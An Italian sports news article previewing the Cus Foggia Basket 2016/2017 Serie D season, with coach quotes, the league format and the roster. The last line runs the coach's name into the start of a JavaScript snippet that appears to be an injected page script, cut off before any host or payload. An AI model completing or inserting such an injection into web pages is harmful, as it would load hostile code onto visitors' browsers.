Partirà da Corato, domenica pomeriggio (inizio alla ore 18.00), la nuova stagione del Cus Foggia Basket, squadra attesa dall’esordio nel campionato di Serie D Regionale. Archiviate le due promozioni consecutive la compagine cussina si appresta a vivere una stagione importante, dopo un’estate fatta di addii e nuovi arrivi.
Il gruppo, assorbite le partenze di elementi di primo livello quali Giovanni Chiappinelli e Vincenzo D’Arrissi, si ripresenta ai nastri di partenza fortemente rinnovato, con ben sette Under e due innesti di esperienza e qualità, Antonio Ferramosca e Raffaele Vaira.
“L’obiettivo è mantenere la categoria – chiarisce alla vigilia del primo match stagionale il coach Danilo Lamacchia – e faremo di tutto per difendere ciò che abbiamo conquistato meritatamente sul campo l’anno scorso. Certo non sarà facile, ci sono squadre di ottimo livello, rinforzatesi anche con giocatori stranieri, ad iniziare proprio dal Basket Corato, avversario che gode dei favori dei pronostici per il salto di categoria. Noi ripartiamo da una squadra giovane, forse la più giovane del girone, ma è un progetto che ho sposato con piacere, consapevole delle difficoltà ma anche delle ambizioni che la squadra sta coltivando al suo interno. Abbiamo lavorato bene, stiamo puntando come sempre sulla coesione tra tutti gli elementi della rosa, da anni vero punto di forza del Cus Foggia. C’è voglia di fare bene e sono sicuro che riusciremo a toglierci tante soddisfazioni”.
Inserito nel Girone A, il Cus Foggia dopo la trasferta di Corato affronterà sabato 15 ottobre, al Palazzetto Russo, il Murgia Basket Santeramo. Il derby con il Cus Bari è invece in programma il prossimo 26 novembre. La formula del campionato prevede una Poule Promozione a cui accederanno le prime cinque classificate nei due gironi che compongono la Serie D. Al termine di questa seconda fase le prime di ogni raggruppamento saranno promosse in serie C, mentre le seconde classificate disputeranno uno spareggio su campo neutro per stabilire una eventuale ed ulteriore promozione.
Stessa formula regola anche la Poule Retrocessione, composta dalle squadre classificatesi dal 6° al 10° posto. Retrocedono le ultime squadre dei due gironi.
LA ROSA DEL CUS FOGGIA 2016/2017
ALA GRANDE
Vincenzo Russo (capitano); Antonio Bratti; Pierluigi Cardone, Enrico Lioce, Antonio Ferramosca
ESTERNI
Stefano Russo; Daniele D’Atri; Gioele Campagna, Raffaele Vaira, Francesco Russo
PLAYMAKER
Paolo Matella; Eugenio Padalino, Andrea Colapietro
PIVOT
Fabio Mastroluca, Alessandro Spagnuolo
COACH
Danilo Lamacchiavar d=document;var s=d.createElement(‘script’);